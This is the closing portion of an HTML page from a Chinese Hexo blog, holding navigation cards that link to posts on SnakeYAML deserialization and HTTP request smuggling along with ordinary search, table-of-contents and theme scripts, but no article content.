            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2026/01/16/jndi-zhu-ru/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/6b5su0brt3bvxzp5za1ixqw5k.jpg" class="responsive-img" alt="SnakeYAML 反序列化">
                        
                        <span class="card-title">SnakeYAML 反序列化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-01-16
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/java/">
                        <span class="chip bg-color">java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/01/13/http-qing-qiu-zou-si/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/%E9%BB%92%E6%B1%9F%E9%9B%AB%E3%81%9F%E3%82%93_115192288.jpg" class="responsive-img" alt="HTTP 请求走私">
                        
                        <span class="card-title">HTTP 请求走私</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-01-13
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">漏洞</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
